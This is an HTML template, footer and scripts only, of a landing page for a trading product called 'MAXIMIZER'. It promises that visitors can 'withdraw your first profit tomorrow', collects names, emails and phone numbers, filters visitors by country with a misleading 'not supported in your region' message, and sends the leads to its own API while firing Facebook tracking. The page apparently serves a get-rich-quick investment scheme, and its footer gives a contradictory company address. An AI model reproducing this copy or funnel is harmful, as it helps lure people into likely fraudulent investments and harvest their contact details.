            <div class="container">
                <div class="row">
                    <div class="col-xs-12 col-sm-12">
                        <div class="register register-footer">
                            <p class="register__intro">
                                Get results in less than 5 minutes. Register now and withdraw your first profit tomorrow!
                            </p>
                            <div class="register__form" id="register">
                                <form class="x_form neo_form register-form" style="width: 100%;" method="post">
                                    <input type="text" placeholder="First Name" name="first_name" class="form-input">
                                    <input type="text" placeholder="Last Name" name="last_name" class="form-input">
                                    <input type="email" placeholder="E-mail" name="email">
                                    <div class="form-group">
                                        <input type="hidden" name="phonePrefix" value="7">
                                        <input type="tel" class="input-phone form-input" placeholder name="phone" required>
                                    </div>
    
                                    <button type="submit" name="submitBtn" class="yellowbutton">Get access</button>
                                </form>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="pr-logo">
                    <!--<img loading="lazy" src="Content/Images/pr.png" width="100%" alt="PR LOGO">-->
                </div>

                <div class="footer-text">
                    <p>“MAXIMIZER” designed by ©MAXITRADE, USA, Menlo Park, Stockton, CA, 95232 Stockton</p>
                </div>

            </div>
        </footer>



        <script>
            const date = new Date();
            const spanDate = document.getElementById('dateNow');
           
            spanDate.innerHTML = date.toLocaleDateString('en-EN', {
                weekday: 'long',
                day: 'numeric',
                month: 'numeric',
                year: 'numeric'
            })
        </script>

        <script src="js/jquery.min.js"></script>
        <!-- intlTelInput -->
        <link rel="stylesheet" href="css/intlTelInput.min.css">
        <script src="js/intlTelInput.min.js"></script>

        <style>
            .error {
                background-color: rgba(255, 0, 0) !important;
            }
            .valid {
                background-color: rgba(0, 255, 0) !important;
            }
            .phoneWrapper {
                width: 100%;
            }

            .input-phone {
                width: 100%;
            }

            .reg-form button img {
                display: none;
                height: 20px;
            }

            .reg-form button:disabled {
                opacity: 0.7;
                cursor: default;
            }

            .reg-form button:disabled img {
                display: inline-block;
            }

            .modal_phone {
                opacity: 1;
                position: fixed;
                top: 0;
                bottom: 0;
                right: 0;
                left: 0;
                z-index: 99999;
                display: none;
                outline: 0;
                padding-right: 15px;
                justify-content: center;
                align-items: center;
                background-color: rgba(0, 0, 0, 0.4);
                overflow-x: hidden;
                overflow-y: auto;
                color: #000;
            }

            .modal_phone.open_phone {
                display: flex;
            }

            .modal-open_phone {
                overflow: hidden;
            }

            .modal-dialog_phone {
                position: relative;
                width: 100%;
                max-width: 32rem;
                padding: 1rem;
                box-sizing: border-box;
            }

            .modal-content_phone {
                display: flex;
                flex-direction: column;
                pointer-events: auto;
                background-color: #fff;
                background-clip: padding-box;
                border: 1px solid rgba(0, 0, 0, 0.2);
                border-radius: 0.3rem;
                outline: 0;
            }

            .modal-header_phone {
                display: flex;
                align-items: center;
                padding: 1rem 1rem;
            }

            .modal-header_phone {
                justify-content: space-between;
                border-top-left-radius: 0.3rem;
                border-top-right-radius: 0.3rem;
            }

            .modal-body_phone {
                position: relative;
                flex: 1 1 auto;
                padding: 1rem;
            }

            .modal-title_phone {
                font-size: 1.25rem;
                font-weight: 600;
            }

            .close-button_phone {
                font-size: 1.5rem;
                font-weight: 700;
                line-height: 1;
                opacity: 0.5;
                background-color: transparent;
                border: 0;
                cursor: pointer;
                padding: 1rem 1rem;
                margin: -1rem -1rem -1rem auto;
            }
        </style>

        <div id="modal_phone" class="modal_phone fade_phone" tabindex="-1">
            <div class="modal-dialog_phone">
                <div class="modal-content_phone">
                    <div class="modal-header_phone">
                        <h5 class="modal-title_phone">Invalid phone</h5>
                        <button type="button" class="close-button_phone" id="close-button_phone">×</button>
                    </div>
                    <div class="modal-body_phone">
                        Sorry! The program is not supported in your region. Enter your Canadian number to participate in the program
                    </div>
                </div>
            </div>
        </div>

        <script>
            const openModal = () => {
                document.getElementById("modal_phone").classList.add("open_phone");
                document.body.classList.add("modal-open_phone");
            };

            const closeModal = () => {
                document.getElementById("modal_phone").classList.remove("open_phone");
                document.body.classList.remove("modal-open_phone");
            };

            document.getElementById("close-button_phone").addEventListener("click", closeModal);

            $(document).ready(function () {
                let phonePrefix = "7";

                $.ajax({
                    url: "{{protocol}}://{{base_url}}/api/geolocation",
                    dataType: "json",
                    success: function (result) {
                        $('input[name="phone"]').each(function (input) {
                            let iti = intlTelInput(this, {
                                ...result.data,
                                autoHideDialCode: "true",
                                customContainer: "phoneWrapper",
                                autoPlaceholder: "aggressive",
                                separateDialCode: "false",
                                utilsScript: "https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.12/js/utils.min.js",
                            });
                            phonePrefix = iti.getSelectedCountryData().dialCode;
                            $(this).on("countrychange", function () {
                                phonePrefix = iti.getSelectedCountryData().dialCode;
                            });
                            return iti;
                        });
                    },
                });

                function validateEmail(email) {
                    return /[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/.test(String(email).toLowerCase());
                }

                function changInputHandler(e) {
                    if (e.target.value.length === 0) {
                        this.classList.remove("valid");
                        this.classList.add("error");
                        return;
                    }
                    this.classList.add("valid");
                    this.classList.remove("error");
                }
                function changEmailHandler(e) {
                    if (validateEmail(e.target.value) === false) {
                        this.classList.add("error");
                        this.classList.remove("valid");
                        return;
                    }
                    this.classList.add("valid");
                    this.classList.remove("error");
                }
                $(".form-input").keyup(changInputHandler);
                $(".form-input").change(changInputHandler);
                $("input[name = email]").keyup(changEmailHandler);
                $("input[name = email]").change(function (e) {});
                $("form.register-form").submit(function (e) {
                    e.preventDefault();
                    const button = $("button[name=submitBtn]");
                    button.prop("disabled", true);
                    const form = $(this);
                    const first_name = form.find("input[name = first_name]");
                    const last_name = form.find("input[name = last_name]");
                    const email = form.find("input[name = email]");
                    const phone = form.find("input[name = phone]");

                    let isError = false;
                    if (first_name.val() === "") {
                        first_name.addClass("error").val("").attr("placeholder", "Enter your first name");
                        isError = true;
                    }

                    if (last_name.val() === "") {
                        last_name.addClass("error").val("").attr("placeholder", "Enter your last name");
                        isError = true;
                    }

                    if (phone.val() === "") {
                        phone.addClass("error").val("").attr("placeholder", "Enter your phone");
                        isError = true;
                    }

                    if (validateEmail(email.val()) === false) {
                        email.addClass("error").val("").attr("placeholder", "You entered an invalid email address");
                        isError = true;
                    }

                    if (isError === true) {
                        button.prop("disabled", false);
                        return;
                    }

                    const checkNumber = new Promise((resolve, reject) => {
                        $.ajax({
                            url: `{{protocol}}://{{base_url}}/api/phone/validate`,
                            type: "post",
                            contentType: "application/json",
                            data: JSON.stringify({
                                phone: `${phonePrefix}${phone.val()}`,
                            }),
                            success: resolve,
                            error: reject,
                        });
                    });
                    const getBlacklist = new Promise(function (resolve, reject) {
                        $.ajax({
                            url: "{{protocol}}://{{base_url}}/api/blacklist",
                            type: "get",
                            contentType: "application/json",
                            success: resolve,
                            error: reject,
                        });
                    });

                    Promise.all([checkNumber, getBlacklist])
                        .then(([checkNumber, blacklist]) => {
                            if (checkNumber.status === false) {
                                button.prop("disabled", false);
                                phone.addClass("error").removeClass("valid").val("").attr("placeholder", "You entered the wrong phone number");
                                return false;
                            }

                            if (blacklist.status === false) {
                                button.prop("disabled", false);
                                return false;
                            }

                            if (blacklist.data.blacklist.includes(checkNumber.data.country_code.toLowerCase())) {
                                button.prop("disabled", false);
                                openModal();
                                setTimeout(closeModal, 5000);

                                return false;
                            }

                            $.ajax({
                                url: "{{protocol}}://{{base_url}}/api/leads",
                                type: "post",
                                contentType: "application/json",
                                data: JSON.stringify({
                                    first_name: first_name.val(),
                                    last_name: last_name.val(),
                                    email: email.val(),
                                    phone: phone.val(),
                                    country: checkNumber.data.country_code,
                                }),
                                dataType: "json",
                                success: function (res) {
                                    if (res.status === true) {
                                        fbq("track", "Lead");
                                        fbq("track", "CompleteRegistration");
                                        switch (res.data.proceedWith) {
                                            case "success":
                                                window.location.href = "/success.html";
                                                break;
                                            case "exist":
                                                window.location.href = "/error.html";
                                                break;
                                            case "redirect":
                                                window.location.href = res.data.redirectUrl;
                                                break;
                                            default:
                                                window.location.href = "/success.html";
                                        }
                                    } else {
                                        alert("Error! Try again");
                                        button.prop("disabled", false);
                                    }
                                },
                                error: function (error) {
                                    button.prop("disabled", false);
                                    console.error(error);
                                },
                            });
                        })
                        .catch(function (error) {
                            button.prop("disabled", false);
                            console.error(error);
                        });
                });
            });
        </script>
        {*demonetization*}

    </body>
</html>
